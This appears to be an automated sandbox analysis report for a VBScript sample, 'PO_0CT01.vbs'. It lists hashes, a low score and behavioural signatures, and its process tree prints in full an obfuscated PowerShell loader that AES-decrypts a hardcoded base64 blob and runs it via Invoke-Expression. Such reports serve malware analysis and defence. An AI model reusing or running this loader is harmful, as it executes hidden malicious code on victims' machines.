Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
01-12-2023 06:40
Static task
static1
Behavioral task
behavioral1
Sample
PO_0CT01.vbs
Resource
win7-20231020-en
windows7-x64
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
PO_0CT01.vbs
Resource
win10v2004-20231127-en
windows10-2004-x64
13 signatures
150 seconds
General
-
Target
PO_0CT01.vbs
-
Size
159KB
-
MD5
dcef6132db05f9704623b495b05c1e4a
-
SHA1
ec64670ba9e10bf41fa634be3f8b7c5bec0f719b
-
SHA256
18f41f2a39ff37e43e2a8e01b0447d613257682929e0d5383458935d8279773c
-
SHA512
6c4eef2875783152687021060b390269e7de5756bcdf45f26880a83a8b65e99240483be5cf72caec6210c706060b53f03ebbf49a46685b4b747fa9c1e27b5b5d
-
SSDEEP
1536:vSBSNS2SNSJSNSImSNSzSNSmSNS8SNSySNSaSNS1SP:v0YzYsYeYmYTY5YHYPYQg
Score
1/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1376 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1376 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 2540 wrote to memory of 1376 2540 WScript.exe powershell.exe PID 2540 wrote to memory of 1376 2540 WScript.exe powershell.exe PID 2540 wrote to memory of 1376 2540 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO_0CT01.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '23176310927586413792';$MqDDxKjJmA = 'FoGLCjqpRliJQi11hCtAOF81slvtFOGU9rZ8dC2DlzWrXEyqWGUQQOHJW5CgkrG9HiJw7HT3KtpsBMjn67ekbpqApBChPtQ/ihi0Nt9z8FNBigpDUVbRtDnwD3Tu6oXpHJLJel6aki1Gm2uQ3RuL+5aSgMLijD4gm6JOGiRWUd+DQTgbDbPxZ6oFmyZwkklfZaNnTUrdcpDLK4js4xG5iZVC3zKEpr76zZsUNix/qoSgK2oeIt45qYtT+EhJoxac39p4cS6IFEob0SYg6VlOCgDluaQvAF4RB2tcFPxfgIuTH1FNl6/Eh9WYo20z/3lwNsHmSbQcHGjhL8cM+ohh5m3hT6JOP7MvwDmFe6HqMDvZ7qRIno7IKJdbRac/vxw84zDypr7pF6HDobu0F/cArm5HCyQ+SkgWSEvzCOp3Mpj1HL9kjiiysv3IPllMuWG5F2W9IN8n0u8aCKMMph1skC9W3mYwLv2bVNqzOV1YeGj9oayIf6BmVQlKi39Fv39mocGla8Z74nek8ELKCP9pHXdL8KjXUQercNkF3xKjdsC/Fx1bn+HHzXw3YABqH6U0CA4bqBLyNJuFlN9F1KmeZh/qEYHrWFJvlUV8YcXDYn8f5aK4RwqaaKE5GgFslt39QkHEkYtd4ijirDyGZ08vMTVNd5qxgSJmbAMhkzpfdIyywqXvUBz213IP+o0HfT0A0MgCisgtdX4i5xJZ0kB4azjFZ8PpSfO87gVtgE4jJhsWK9w7FOAZgaNj0i6ovZ7fsK2XXa4GIgF3UajMao5ITbyi3/rb3ANXX+zIUBb+U7DumftlEauMlYY09L9Nh+y1eeHK17CBzcEAILXg56LQJrv6rE3sFaWkAnmUlIUpGNT+SwBTZkK080gVlk2jrY6qJ+eb1d1kK49HlqvKT8bM1EK+nOEvOSyzlIL2ogfhjs6o2a24qtsD9Fh9ou+zbo3aZLK0VwfZx+4gaYQgREUtctIFT9uxSsPMhikmm9fLDZp21+SIzwfSM2fCG1KP56d3jePTR9lhXrZYqX2P9zLNviWqm+jwwURjmeEljvzioyhzmtJ+z5Cr1Pl/w87XTBliumSakj6M86L1Phi0ZORYzicjvALjdsa0GhwyOaOkULl99w8dEwJiZvF6SP/FB3JiYrF3rdqXlLGcZwvZ4xVIoprzWyb98JbKykcExHMBepLzGCe4ca773/Ikiv8lFXJI31KLYJShBcWnUe1lIk7hTZCCP0d8BUEdE3d4fumE3KN8MuyvO7VyzBEGsCKd5QoEW6fKJNl9Y30jwALwq+rhfUMv0Xyxj93w8eApWbx/zh5RaBjmY9ifQETWKwK3tT+LaLdd1Ww/vvPPbAr/HedbdlVdxT1KTyFGExQjSBWDeotvmUkcD6+usolisMw7y93SbQys388JGPJSQCADs5ULDDbE04R2eWBgnUSHSrl57Mp6EVKBhoIVYym6V8lSbq/nQNr7LeeAHuxr98QbQNdu3aguSrF8Mw6yY5pwfhqFl4elRXiP/9/hSD9WZEcSPrs8jeZlgK17K+vxfzr0jg2JL0B5gAyTanNw+zQkmANpOhkMj4ilJ5+dRFMTT7/JW12ZnclRQFtBtTtFgW9qeLzWaE5N2OLr3MTcux2+/OxiSdSUM9paK2l1wALhUoIp1I/TWxQsbyE0dFMC40Qes/fQl4QuMWm7C+xV3hxnHC9Np+zl5gj4M4J35KIB4hWYxmTHvYKeNU6amsgzAvKnToKUqQ==';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1376